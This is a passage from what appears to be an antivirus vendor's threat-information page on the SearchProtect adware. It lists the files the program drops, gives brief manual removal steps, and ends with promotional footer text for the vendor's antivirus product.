    %Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\Logs\sp_nsr6.log (1847 bytes)
    %Program Files%\SearchProtect\Main\rep\SystemRepository.dat (590 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\installer.pak (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr6.exe (72144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc5.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GT6VKRAN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPYZIJUB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc4.tmp (2821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZUR84N48\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe (72144 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now